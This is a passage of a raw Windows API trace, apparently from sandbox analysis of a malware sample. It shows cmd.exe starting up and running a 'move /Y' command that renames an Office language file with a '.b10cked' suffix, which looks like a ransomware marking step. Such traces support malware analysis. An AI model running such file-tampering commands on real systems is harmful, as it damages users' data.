| out: phkResult=0x1cfc44*=0x0) returned 0x2 [0155.091] VirtualQuery (in: lpAddress=0x1cfc7b, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: 
lpAddress=0xd0000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.091] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc14, dwLength=0x1c | out: lpBuffer=0x1cfc14*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0155.091] GetConsoleOutputCP () returned 0x1b5 [0155.091] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0155.091] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0155.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.092] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0155.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.092] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0155.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.092] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0155.092] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.092] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0155.092] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.092] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0155.092] GetEnvironmentStringsW () returned 0x370210* [0155.092] FreeEnvironmentStringsW 
(penv=0x370210) returned 1 [0155.093] GetEnvironmentStringsW () returned 0x370210* [0155.093] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0155.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebb4 | out: phkResult=0x1cebb4*=0x40) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0xa0, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x40, 
lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegCloseKey (hKey=0x40) returned 0x0 [0155.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebb4 | out: phkResult=0x1cebb4*=0x40) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x40, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x1, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x0, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x4, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x4) returned 0x0 [0155.093] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebbc, lpData=0x1cebc0, lpcbData=0x1cebb8*=0x1000 | out: lpType=0x1cebbc*=0x0, lpData=0x1cebc0*=0x9, lpcbData=0x1cebb8*=0x1000) returned 0x2 [0155.093] RegCloseKey (hKey=0x40) 
returned 0x0 [0155.093] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637d [0155.093] srand (_Seed=0x5b88637d) [0155.093] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"" [0155.093] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"" [0155.094] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.094] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0155.094] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0155.094] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0155.094] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0155.094] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0155.094] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0155.094] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0155.094] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0155.094] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0155.094] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0155.094] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0155.094] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0155.094] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0155.094] GetEnvironmentStringsW () returned 0x372360* [0155.094] FreeEnvironmentStringsW (penv=0x372360) returned 1 [0155.094] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.095] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0155.095] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0155.095] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0155.095] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0155.095] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0155.095] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0155.095] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0155.095] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0155.095] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0155.095] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf980, lpFilePart=0x1cf97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf97c*="Desktop") returned 0x18 [0155.095] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0155.095] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc) returned 0x3709f0 [0155.095] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0155.095] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc) returned 0x3709f0 [0155.095] FindClose (in: 
hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0155.096] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc) returned 0x3709f0 [0155.096] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0155.096] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0155.096] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0155.096] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0155.096] GetEnvironmentStringsW () returned 0x370210* [0155.096] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0155.096] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.096] GetConsoleOutputCP () returned 0x1b5 [0155.097] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0155.097] GetUserDefaultLCID () returned 0x409 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="1") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0155.098] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0155.098] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0155.099] GetConsoleTitleW (in: lpConsoleTitle=0x360930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.099] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0155.099] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0155.099] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0155.099] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0155.100] _wcsicmp (_String1="move", _String2=")") returned 68 [0155.100] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0155.100] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0155.100] _wcsicmp (_String1="IF", _String2="move") returned -4 [0155.100] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0155.100] _wcsicmp (_String1="REM", _String2="move") returned 5 [0155.100] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0155.103] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7b8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.103] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0155.103] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0155.103] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0155.103] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0155.103] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0155.103] _wcsicmp (_String1="move", _String2="CD") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="REN") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0155.104] _wcsicmp (_String1="move", _String2="SET") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0155.104] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0155.104] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0155.104] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0155.104] _wcsicmp (_String1="move", _String2="MD") returned 11 [0155.104] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0155.104] _wcsicmp (_String1="move", _String2="RD") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0155.104] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0155.104] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0155.104] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0155.104] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0155.104] _wcsicmp (_String1="move", _String2="VER") returned -9 [0155.104] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0155.104] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0155.104] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0155.104] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0155.104] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0155.104] _wcsicmp (_String1="move", _String2="START") returned -6 [0155.104] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0155.104] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0155.104] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0155.105] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.106] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf574, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf56c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf56c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0155.106] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0155.107] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0155.107] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0155.107] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0155.107] _wcsicmp 
(_String1="ONINTL~1.TRX", _String2="..") returned 65 [0155.107] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~1.trx")) returned 0x2020 [0155.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0155.107] SetErrorMode (uMode=0x0) returned 0x0 [0155.107] SetErrorMode (uMode=0x1) returned 0x0 [0155.108] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1ceefc, lpFilePart=0x1ceee4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", lpFilePart=0x1ceee4*="ONINTL~1.TRX") returned 0x3c [0155.108] SetErrorMode (uMode=0x0) returned 0x1 [0155.108] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0155.108] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0155.108] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0155.108] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~1.trx")) returned 0x2020 [0155.108] SetErrorMode (uMode=0x0) returned 0x0 [0155.108] SetErrorMode (uMode=0x1) returned 0x0 [0155.108] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cf378, lpFilePart=0x1cf110 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", lpFilePart=0x1cf110*="ONINTL~1.TRX") returned 0x3c [0155.108] SetErrorMode (uMode=0x0) returned 0x1 [0155.108] SetErrorMode (uMode=0x0) returned 0x0 [0155.108] SetErrorMode (uMode=0x1) returned 0x0 [0155.108] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf580, lpFilePart=0x1cf110 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x1cf110*="ONINTL.DLL.trx_dll.b10cked") returned 0x4a [0155.108] SetErrorMode (uMode=0x0) returned 0x1 [0155.108] SetLastError (dwErrCode=0x0) [0155.109] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.dll.trx_dll.b10cked")) returned 0xffffffff [0155.109] GetLastError () returned 0x2 [0155.109] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1cea8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea8c) returned 0x372128 [0155.109] FindNextFileW (in: hFindFile=0x372128, lpFindFileData=0x1cea8c | out: lpFindFileData=0x1cea8c) returned 0 [0155.109] GetLastError () returned 0x12 [0155.109] FindClose (in: hFindFile=0x372128 | out: hFindFile=0x372128) returned 1 [0155.110] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cb8) returned 0x372128 [0155.111] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ced24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0155.111] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ced24, lpFilePart=0x0 | out: 
